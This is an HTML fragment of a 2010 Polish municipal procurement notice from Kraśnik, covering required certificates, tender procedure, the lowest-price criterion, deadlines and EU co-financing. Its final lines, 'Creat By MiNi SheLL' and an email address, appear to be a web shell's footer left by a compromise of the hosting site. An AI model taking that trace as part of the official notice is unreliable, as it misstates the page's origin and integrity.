<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.lublin.pl/miastokrasnik/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
p. 218.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2010 godzina 11:00, miejsce: Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
Kancelaria ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 17.04.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z środków UE..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com